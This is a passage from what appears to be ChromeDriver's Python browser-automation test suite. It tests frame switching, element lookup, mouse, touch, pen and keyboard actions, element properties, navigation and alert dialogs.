selector", "#l1") self._driver.SwitchToMainFrame() self._driver.SwitchToFrame('fourth_frame') self.assertTrue('One' in self._driver.GetPageSource()) self._driver.SwitchToMainFrame() self._driver.SwitchToFrameByIndex(4) self._driver.FindElement("css selector", "#aa1") def testExecuteInRemovedFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);' 'window.addEventListener("message",' ' function(event) { document.body.removeChild(frame); });') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('id') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.ExecuteScript('parent.postMessage("remove", "*");') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) def testSwitchToStaleFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);') element = self._driver.FindElement("css selector", "#id") self._driver.SwitchToFrame(element) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) with self.assertRaises(chromedriver.StaleElementReference): self._driver.SwitchToFrame(element) def testGetTitle(self): script = 'document.title = "title"; return 1;' self.assertEquals(1, self._driver.ExecuteScript(script)) self.assertEquals('title', self._driver.GetTitle()) def testGetPageSource(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) self.assertTrue('Link to empty.html' in self._driver.GetPageSource()) def testFindElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') self.assertTrue( isinstance(self._driver.FindElement('tag name', 'div'), webelement.WebElement)) def testNoSuchElementExceptionMessage(self): 
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') self.assertRaisesRegexp(chromedriver.NoSuchElement, 'no such element: Unable ' 'to locate element: {"method":"tag name",' '"selector":"divine"}', self._driver.FindElement, 'tag name', 'divine') def testFindElements(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') divs = self._driver.FindElements('tag name', 'div') self.assertTrue(isinstance(divs, list)) self.assertEquals(2, len(divs)) for div in divs: self.assertTrue(isinstance(div, webelement.WebElement)) def testFindChildElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";') element = self._driver.FindElement('tag name', 'div') self.assertTrue( isinstance(element.FindElement('tag name', 'br'), webelement.WebElement)) def testFindChildElements(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div><br><br></div><div><br></div>";') element = self._driver.FindElement('tag name', 'div') brs = element.FindElements('tag name', 'br') self.assertTrue(isinstance(brs, list)) self.assertEquals(2, len(brs)) for br in brs: self.assertTrue(isinstance(br, webelement.WebElement)) def testClickElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("click", function() {' ' div.innerHTML="new<br>";' '});' 'return div;') div.Click() self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testClickElementInSubFrame(self): 
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) # Test clicking element in the sub frame. self.testClickElement() def testClickElementAfterNavigation(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) link = self._driver.FindElement('css selector', '#l1') link.Click() alert_button = self._driver.FindElement('css selector', '#aa1') alert_button.Click() self.assertTrue(self._driver.IsAlertOpen()) def testActionsMouseMove(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("mouseover", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "actions": [{"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("click", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": 
"pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseDoubleClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseTripleClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'window.click_counts = [];' 'div.addEventListener("click", event => {' ' window.click_counts.push(event.detail);' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) click_counts = self._driver.ExecuteScript('return window.click_counts') self.assertEquals(3, len(click_counts)) self.assertEquals(1, click_counts[0]) 
self.assertEquals(2, click_counts[1]) self.assertEquals(3, click_counts[2]) def testActionsMouseResetCountOnOtherButton(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 1}, {"type": "pointerUp", "button": 1}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(0, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseResetCountOnMove(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerMove", "x": 30, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(0, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseDrag(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/drag.html')) target = 
self._driver.FindElement('css selector', '#target') # Move to center of target element and drag it to a new location. actions = ({'actions': [{ "actions": [{"duration": 32, "type": "pause"}, {"duration": 32, "type": "pause"}, {"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { 'type': 'pointer', 'actions': [ {'type': 'pointerMove', 'x': 100, 'y': 100}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerMove', 'x': 150, 'y': 175} ], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) rect = target.GetRect() self.assertAlmostEqual(100, rect['x'], delta=1) self.assertAlmostEqual(125, rect['y'], delta=1) # Without releasing mouse button, should continue the drag. actions = ({'actions': [{ "actions": [{"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { 'type': 'pointer', 'actions': [ {'type': 'pointerMove', 'x': 15, 'y': 20, 'origin': 'pointer'} ], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) rect = target.GetRect() self.assertAlmostEqual(115, rect['x'], delta=1) self.assertAlmostEqual(145, rect['y'], delta=1) # Releasing mouse button stops the drag. 
actions = ({'actions': [{ "actions": [{"duration": 32, "type": "pause"}, {"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { 'type': 'pointer', 'actions': [ {'type': 'pointerUp', 'button': 0}, {'type': 'pointerMove', 'x': 25, 'y': 25, 'origin': 'pointer'} ], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) rect = target.GetRect() self.assertAlmostEqual(115, rect['x'], delta=1) self.assertAlmostEqual(145, rect['y'], delta=1) def testActionsWheelScroll(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "1000px";' 'div.addEventListener("wheel", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') time.sleep(1) actions = ({"actions": [{ "type":"wheel", "actions":[{"type": "scroll", "x": 10, "y": 10, "deltaX": 5, "deltaY": 15}], "id": "wheel1"}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsTouchTap(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("click", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown"}, {"type": "pointerUp"}], "parameters": {"pointerType": "touch"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag 
name', 'br'))) def testActionsMultiTouchPoint(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div id='div' autofocus style='width:200px; height:200px'>"; window.events = []; const div = document.getElementById('div'); div.addEventListener('touchstart', event => { window.events.push( {type: event.type, x: event.touches[event.touches.length - 1].clientX, y: event.touches[event.touches.length - 1].clientY}); }); div.addEventListener('touchend', event => { window.events.push( {type: event.type}); }); ''') time.sleep(1) actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 50, "y": 50}, {"type": "pointerDown"}, {"type": "pointerUp"}], "parameters": {"pointerType": "touch"}, "id": "pointer1"}, { "type":"pointer", "actions":[{"type": "pointerMove", "x": 60, "y": 60}, {"type": "pointerDown"}, {"type": "pointerUp"}], "parameters": {"pointerType": "touch"}, "id": "pointer2"}]}) self._driver.PerformActions(actions) time.sleep(1) events = self._driver.ExecuteScript('return window.events') self.assertEquals(4, len(events)) self.assertEquals("touchstart", events[0]['type']) self.assertEquals("touchstart", events[1]['type']) self.assertEquals("touchend", events[2]['type']) self.assertEquals("touchend", events[3]['type']) self.assertAlmostEqual(50, events[0]['x'], delta=1) self.assertAlmostEqual(50, events[0]['y'], delta=1) self.assertAlmostEqual(60, events[1]['x'], delta=1) self.assertAlmostEqual(60, events[1]['y'], delta=1) self._driver.ReleaseActions() def testActionsMulti(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div id='div' autofocus style='width:200px; height:200px'>"; window.events = []; const div = document.getElementById('div'); div.addEventListener('click', event => { window.events.push( {x: event.clientX, y: event.clientY}); }); ''') # Move mouse to (50, 50). 
self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50} ] } ]}) # Click mouse button. ChromeDriver should remember that mouse is at # (50, 50). self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerDown', "button": 0}, {'type': 'pointerUp', "button": 0} ] } ]}) events = self._driver.ExecuteScript('return window.events') self.assertEquals(1, len(events)) self.assertAlmostEqual(50, events[0]['x'], delta=1) self.assertAlmostEqual(50, events[0]['y'], delta=1) # Clean up action states, move mouse back to (0, 0). self._driver.ReleaseActions() # Move mouse relative by (80, 80) pixels, and then click. self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 80, 'y': 80, 'origin': 'pointer'}, {'type': 'pointerDown', "button": 0}, {'type': 'pointerUp', "button": 0} ] } ]}) events = self._driver.ExecuteScript('return window.events') self.assertEquals(2, len(events)) self.assertAlmostEqual(80, events[1]['x'], delta=1) self.assertAlmostEqual(80, events[1]['y'], delta=1) self._driver.ReleaseActions() def testActionsPenPointerEventProperties(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div>test</div>"; var div = document.getElementsByTagName("div")[0]; div.style["width"] = "100px"; div.style["height"] = "100px"; window.events = []; div.addEventListener("pointerdown", event => { window.events.push( {type: event.type, x: event.clientX, y: event.clientY, width: event.width, height: event.height, pressure: event.pressure, tiltX: event.tiltX, tiltY: event.tiltY, twist: event.twist}); }); ''') time.sleep(1) actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 30, "y": 30}, {"type": "pointerDown", "button": 0, "pressure":0.55, "tiltX":-36, "tiltY":83, "twist":266}, {"type": 
"pointerMove", "x": 50, "y": 50}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) time.sleep(1) events = self._driver.ExecuteScript('return window.events') self.assertEquals(1, len(events)) self.assertEquals("pointerdown", events[0]['type']) self.assertAlmostEqual(30, events[0]['x'], delta=1) self.assertAlmostEqual(30, events[0]['y'], delta=1) self.assertEquals(1.0, round(events[0]['width'], 2)) self.assertEquals(1.0, round(events[0]['height'], 2)) self.assertEquals(0.55, round(events[0]['pressure'], 2)) self.assertEquals(-36, events[0]['tiltX']) self.assertEquals(83, events[0]['tiltY']) self.assertEquals(266, events[0]['twist']) def testActionsPenPointerEventPressure(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div>test</div>"; var div = document.getElementsByTagName("div")[0]; div.style["width"] = "100px"; div.style["height"] = "100px"; window.events = []; var event_list = ["pointerdown", "pointermove", "pointerup"]; for (var i = 0; i < event_list.length; i++) { div.addEventListener(event_list[i], event => { window.events.push( {type: event.type, x: event.clientX, y: event.clientY, pressure: event.pressure, twist: event.twist}); }); } ''') time.sleep(1) actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 30, "y": 30}, {"type": "pointerDown", "button": 0, "twist":30}, {"type": "pointerMove", "x": 50, "y": 50}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "pen"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) time.sleep(1) events = self._driver.ExecuteScript('return window.events') self.assertEquals(4, len(events)) self.assertEquals("pointermove", events[0]['type']) self.assertAlmostEqual(30, events[0]['x'], delta=1) self.assertAlmostEqual(30, events[0]['y'], delta=1) self.assertEquals(0.0, round(events[0]['pressure'], 2)) 
self.assertEquals(0, events[0]['twist']) self.assertEquals("pointerdown", events[1]['type']) self.assertAlmostEqual(30, events[1]['x'], delta=1) self.assertAlmostEqual(30, events[1]['y'], delta=1) self.assertEquals(0.5, round(events[1]['pressure'], 2)) self.assertEquals(30, events[1]['twist']) self.assertEquals("pointermove", events[2]['type']) self.assertAlmostEqual(50, events[2]['x'], delta=1) self.assertAlmostEqual(50, events[2]['y'], delta=1) self.assertEquals(0.5, round(events[2]['pressure'], 2)) self.assertEquals(0, events[2]['twist']) self.assertEquals("pointerup", events[3]['type']) self.assertAlmostEqual(50, events[3]['x'], delta=1) self.assertAlmostEqual(50, events[3]['y'], delta=1) self.assertEquals(0.0, round(events[3]['pressure'], 2)) self.assertEquals(0, events[3]['twist']) def testActionsPause(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<input type='text' autofocus style='width:100px; height:100px'>"; window.events = []; const input = document.getElementsByTagName("input")[0]; const listener = e => window.events.push({type: e.type, time: e.timeStamp}); input.addEventListener("keydown", listener); input.addEventListener("keyup", listener); input.addEventListener("mousedown", listener); ''') # Actions on 3 devices, across 6 ticks, with 200 ms pause at ticks 1 to 4. 
# Tick "key" device "pointer" device "none" device # 0 move # 1 pause 200 ms pointer down pause 100 ms # 2 "a" key down pointer up pause 200 ms # 3 "a" key up pause 200 ms # 4 "b" key down move 200 ms # 5 "b" key up actions = {'actions': [ { 'type': 'key', 'id': 'key', 'actions': [ {'type': 'pause'}, {'type': 'pause', 'duration': 200}, {'type': 'keyDown', 'value': 'a'}, {'type': 'keyUp', 'value': 'a'}, {'type': 'keyDown', 'value': 'b'}, {'type': 'keyUp', 'value': 'b'}, ] }, { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}, {'type': 'pause', 'duration': 200}, {'type': 'pointerMove', 'duration': 200, 'x': 10, 'y': 10}, ] }, { 'type': 'none', 'id': 'none', 'actions': [ {'type': 'pause'}, {'type': 'pause', 'duration': 100}, {'type': 'pause', 'duration': 200}, ] } ]} self._driver.PerformActions(actions) events = self._driver.ExecuteScript('return window.events') expected_events = ['mousedown', 'keydown', 'keyup', 'keydown', 'keyup'] self.assertEquals(len(expected_events), len(events)) for i in range(len(events)): self.assertEqual(expected_events[i], events[i]['type']) if i > 0: elapsed_time = events[i]['time'] - events[i-1]['time'] self.assertGreaterEqual(elapsed_time, 200) def testReleaseActions(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<input id='target' type='text' style='width:200px; height:200px'>"; window.events = []; const recordKeyEvent = event => { window.events.push( {type: event.type, code: event.code}); }; const recordMouseEvent = event => { window.events.push( {type: event.type, x: event.clientX, y: event.clientY}); }; const target = document.getElementById('target'); target.addEventListener('keydown', recordKeyEvent); target.addEventListener('keyup', recordKeyEvent); target.addEventListener('mousedown', recordMouseEvent); 
        target.addEventListener('mouseup', recordMouseEvent);
        ''')
    # Move mouse to (50, 50), press a mouse button, and press a key.
    self._driver.PerformActions({'actions': [
        {
            'type': 'pointer',
            'id': 'mouse',
            'actions': [
                {'type': 'pointerMove', 'x': 50, 'y': 50},
                {'type': 'pointerDown', "button": 0}
            ]
        },
        {
            'type': 'key',
            'id': 'key',
            'actions': [
                {'type': 'pause'},
                {'type': 'pause'},
                {'type': 'keyDown', 'value': 'a'}
            ]
        }
    ]})
    # Only the "down" halves ran: one mousedown and one keydown so far.
    events = self._driver.ExecuteScript('return window.events')
    self.assertEquals(2, len(events))
    self.assertEquals('mousedown', events[0]['type'])
    self.assertAlmostEqual(50, events[0]['x'], delta=1)
    self.assertAlmostEqual(50, events[0]['y'], delta=1)
    self.assertEquals('keydown', events[1]['type'])
    self.assertEquals('KeyA', events[1]['code'])
    # ReleaseActions must undo held inputs in reverse order: keyup first,
    # then mouseup at the pointer's last position.
    self._driver.ReleaseActions()
    events = self._driver.ExecuteScript('return window.events')
    self.assertEquals(4, len(events))
    self.assertEquals('keyup', events[2]['type'])
    self.assertEquals('KeyA', events[2]['code'])
    self.assertEquals('mouseup', events[3]['type'])
    self.assertAlmostEqual(50, events[3]['x'], delta=1)
    self.assertAlmostEqual(50, events[3]['y'], delta=1)

  def testActionsCtrlCommandKeys(self):
    """Verifies select-all/cut/paste via the actions API with ctrl/cmd."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('''
        document.write('<input type="text" id="text1" value="Hello World" />');
        document.write('<br/>')
        document.write('<input type="text" id="text2">');
        var text1 = document.getElementById("text1");
        text1.addEventListener("click", function() {
          var text1 = document.getElementById("text1");
          text1.value="new text";
        });
        ''')
    time.sleep(1)
    elem1 = self._driver.FindElement('css selector', '#text1')
    elem2 = self._driver.FindElement('css selector', '#text2')
    self.assertEquals("Hello World", elem1.GetProperty('value'))
    time.sleep(1)
    platform = util.GetPlatformName()
    # \uE009 is the WebDriver Control key; \uE03D is Meta (cmd) for mac.
    modifier_key = u'\uE009'
    if platform == 'mac':
      modifier_key = u'\uE03D'
    # This is a sequence of actions, first move the mouse to input field
    # "elem1", then press ctrl/cmd key and 'a' key to select all the text in
    # "elem1", and then press 'x' to cut the text and move the mouse to input
    # field "elem2" and press 'v' to paste the text, and at the end, we check
    # the texts in both input fields to see if the text are cut and pasted
    # correctly from "elem1" to "elem2".
    actions = ({'actions': [{
        'type': 'key',
        'id': 'key',
        'actions': [
            {'type': 'pause'},
            {'type': 'pause'},
            {'type': 'pause'},
            {'type': 'keyDown', 'value': modifier_key},
            {'type': 'keyDown', 'value': 'a'},
            {'type': 'keyUp', 'value': 'a'},
            {'type': 'keyDown', 'value': 'x'},
            {'type': 'keyUp', 'value': 'x'},
            {'type': 'keyUp', 'value': modifier_key},
            {'type': 'pause'},
            {'type': 'pause'},
            {'type': 'pause'},
            {'type': 'keyDown', 'value': modifier_key},
            {'type': 'keyDown', 'value': 'v'},
            {'type': 'keyUp', 'value': 'v'},
            {'type': 'keyUp', 'value': modifier_key}
        ]},
        {'type':'pointer',
         'actions':[{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem1},
                    {'type': 'pointerDown', 'button': 0},
                    {'type': 'pointerUp', 'button': 0},
                    {'type': 'pause'},
                    {'type': 'pause'},
                    {'type': 'pause'},
                    {'type': 'pause'},
                    {'type': 'pause'},
                    {'type': 'pause'},
                    {'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem2},
                    {'type': 'pointerDown', 'button': 0},
                    {'type': 'pointerUp', 'button': 0},
                    {'type': 'pause'},
                    {'type': 'pause'},
                    {'type': 'pause'},
                    {'type': 'pause'}],
         'parameters': {'pointerType': 'mouse'},
         'id': 'pointer1'}
    ]})
    self._driver.PerformActions(actions)
    time.sleep(1)
    self.assertEquals("", elem1.GetProperty('value'))
    self.assertEquals("new text", elem2.GetProperty('value'))
    time.sleep(1)

  def testPageLoadStrategyIsNormalByDefault(self):
    """The W3C default page load strategy must be 'normal'."""
    self.assertEquals('normal',
                      self._driver.capabilities['pageLoadStrategy'])

  def testClearElement(self):
    """Element Clear must empty a text input's value."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    text = self._driver.ExecuteScript(
        'document.body.innerHTML = \'<input type="text" value="abc">\';'
        'return document.getElementsByTagName("input")[0];')
    value = self._driver.ExecuteScript('return 
arguments[0].value;', text)
    self.assertEquals('abc', value)
    text.Clear()
    value = self._driver.ExecuteScript('return arguments[0].value;', text)
    self.assertEquals('', value)

  def testSendKeysToInputFileElement(self):
    """Sending a path to <input type=file> selects that file."""
    file_name = os.path.join(_TEST_DATA_DIR, 'anchor_download_test.png')
    self._driver.Load(ChromeDriverTest.GetHttpUrlForFile(
        '/chromedriver/file_input.html'))
    elem = self._driver.FindElement('css selector', '#id_file')
    elem.SendKeys(file_name)
    text = self._driver.ExecuteScript(
        'var input = document.getElementById("id_file").value;'
        'return input;')
    # Browsers mask the real path behind the C:\fakepath\ prefix.
    self.assertEquals('C:\\fakepath\\anchor_download_test.png', text);
    if not _ANDROID_PACKAGE_KEY:
      # A nonexistent file must be rejected with "invalid argument".
      self.assertRaises(chromedriver.InvalidArgument,
                        elem.SendKeys, "/blah/blah/blah")

  def testSendKeysToNonTypeableInputElement(self):
    """SendKeys sets the value of non-typeable inputs such as color."""
    self._driver.Load("about:blank")
    self._driver.ExecuteScript(
        "document.body.innerHTML = '<input type=\"color\">';")
    elem = self._driver.FindElement('tag name', 'input');
    input_value = '#7fffd4'
    elem.SendKeys(input_value)
    value = elem.GetProperty('value')
    self.assertEquals(input_value, value)

  def testGetElementAttribute(self):
    """Get Element Attribute returns the attribute's string value."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/attribute_colon_test.html'))
    elem = self._driver.FindElement("css selector", "*[name='phones']")
    self.assertEquals('3', elem.GetAttribute('size'))

  def testGetElementProperty(self):
    """Get Element Property returns DOM property values."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/two_inputs.html'))
    elem = self._driver.FindElement("css selector", "#first")
    self.assertEquals('text', elem.GetProperty('type'))
    self.assertEquals('first', elem.GetProperty('id'))

  def testGetElementSpecialCharAttribute(self):
    """Attributes with a colon in the name (e.g. ext:qtip) are readable."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/attribute_colon_test.html'))
    elem = self._driver.FindElement("css selector", "*[name='phones']")
    self.assertEquals('colonvalue', elem.GetAttribute('ext:qtip'))

  def testGetCurrentUrl(self):
    """GetCurrentUrl reports the top-level URL even from inside a frame."""
    url = self.GetHttpUrlForFile('/chromedriver/frame_test.html')
    self._driver.Load(url)
    self.assertEquals(url, self._driver.GetCurrentUrl())
    self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
    self.assertEquals(url, self._driver.GetCurrentUrl())

  def testGoBackAndGoForward(self):
    """Back/Forward on a single-entry history must not raise."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.GoBack()
    self._driver.GoForward()

  def testDontGoBackOrGoForward(self):
    """Back/Forward with no history entries leaves the URL unchanged."""
    # We need to run this test in a new tab so that it is isolated from previous
    # test runs.
    old_windows = self._driver.GetWindowHandles()
    self._driver.ExecuteScript('window.open("about:blank")')
    new_window = self.WaitForNewWindow(self._driver, old_windows)
    self._driver.SwitchToWindow(new_window)
    self.assertEquals('about:blank', self._driver.GetCurrentUrl())
    self._driver.GoBack()
    self.assertEquals('about:blank', self._driver.GetCurrentUrl())
    self._driver.GoForward()
    self.assertEquals('about:blank', self._driver.GetCurrentUrl())

  def testBackNavigationAfterClickElement(self):
    """GoBack after clicking a link returns to the original page."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
    link = self._driver.FindElement('css selector', '#l1')
    link.Click()
    self._driver.GoBack()
    self.assertNotEqual('data:,', self._driver.GetCurrentUrl())
    self.assertEquals(self.GetHttpUrlForFile('/chromedriver/link_nav.html'),
                      self._driver.GetCurrentUrl())

  def testAlertHandlingOnPageUnload(self):
    """A beforeunload dialog raised by GoBack can be accepted."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('window.onbeforeunload=function(){return true}')
    # A user gesture (click) is required for beforeunload dialogs to fire.
    self._driver.FindElement('tag name', 'body').Click()
    self._driver.GoBack()
    self.assertTrue(self._driver.IsAlertOpen())
    self._driver.HandleAlert(True)
    self.assertFalse(self._driver.IsAlertOpen())

  def testRefresh(self):
    """Refresh on a loaded page must not raise."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.Refresh()

  def testAlert(self):
    """Dismissing a confirm() dialog makes it return false."""
    self.assertFalse(self._driver.IsAlertOpen())
    self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');')
    self.assertTrue(self._driver.IsAlertOpen())
    self.assertEquals('HI', self._driver.GetAlertMessage())
    self._driver.HandleAlert(False)
    self.assertFalse(self._driver.IsAlertOpen())
    self.assertEquals(False,
                      self._driver.ExecuteScript('return window.confirmed'))

  def testSendTextToAlert(self):
